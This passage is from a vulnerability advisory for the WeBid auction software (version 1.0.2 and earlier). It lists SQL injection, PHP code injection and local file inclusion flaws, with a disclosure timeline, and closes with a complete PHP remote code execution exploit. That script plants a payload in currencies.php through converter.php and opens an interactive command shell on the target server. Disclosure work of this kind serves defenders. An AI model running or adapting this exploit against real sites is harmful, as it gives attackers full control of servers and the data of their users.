check_mysql($res, $query, __LINE__, __FILE__); 157. $item_title = mysql_result($res, 0, 'title'); Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154. [-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php: 21. if (isset($_COOKIE['WEBID_RM_ID'])) 22. { 23. $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'"; 24. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__); 25. setcookie('WEBID_RM_ID', '', time() - 3600); 26. } Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23. [-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php: 84. if (isset($_COOKIE['WEBID_ONLINE'])) 85. { 86. $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'"; 87. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__); 88. } Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86. [-] Vulnerable code to arbitrary PHP code jnjection (works with magic_quotes_gpc = off) in /includes/converter.inc.php: 61. function buildcache($newaarray) 62. { 63. global $include_path; 64. 65. $output_filename = $include_path . 'currencies.php'; 66. $output = " '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')"; 73. if ($i < (count($newaarray) - 1)) 74. { 75. $output .= ",\n"; 76. } 77. else 78. { 79. $output .= "\n"; 80. } 81. } 82. 83. $output .= ");\n?>\n"; 84. 85. $handle = fopen($output_filename, 'w'); 86. fputs($handle, $output); 87. fclose($handle); 88. } Input passed to buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being written to currencies.php file, this can lead to arbitrary PHP code injection. [-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php: 18. if (isset($_GET['lan']) && !empty($_GET['lan'])) 19. { 20. if ($user->logged_in) 21. { 22. $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id']; 23. } 24. else 25. { 26. // Set language cookie 27. setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/'); 28. } 29. $language = $_GET['lan']; 30. } 31. elseif ($user->logged_in) 32. { 33. $language = $user->user_data['language']; 34. } 35. elseif (isset($_COOKIE['USERLANGUAGE'])) 36. { 37. $language = $_COOKIE['USERLANGUAGE']; 38. } 39. else 40. { 41. $language = $system->SETTINGS['defaultlanguage']; 42. } 43. 44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage']; 45. 46. include $main_path . 'language/' . $language . '/messages.inc.php'; Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before being used to include files on line 46. This can be exploited to include arbitrary local files. [-] Information leak vulnerability into /logs directory, cause anyone can read cron.log and error.log [-] Disclosure timeline: [19/06/2011] - Vulnerabilities discovered [19/06/2011] - Vendor contacted [20/06/2011] - Vendor contacted again [21/06/2011] - No response from vendor [21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34 [22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1 [22/06/2011] - Vendor responsed and released patches: http://www.webidsupport.com/forums/showthread.php?3892 [04/07/2011] - Public disclosure */ error_reporting(E_ERROR); set_time_limit(0); if (!extension_loaded("curl")) die("cURL extension required\n"); $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_VERBOSE, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); function http_post($page, $data) { global $ch, $url; curl_setopt($ch, CURLOPT_URL, $url.$page); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); return curl_exec($ch); } print "\n+----------------------------------------------------------------------+"; print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |"; print "\n+----------------------------------------------------------------------+\n"; if ($argc < 2) { print "\nUsage......: php $argv[0] \n"; print "\nExample....: php $argv[0] https://localhost/"; print "\nExample....: php $argv[0] http://localhost/webid/\n"; die(); } $url = $argv[1]; $code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//"); http_post("converter.php", "action=convert&from=USD&to={$code}"); while(1) { print "\nwebid-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n"); } ?>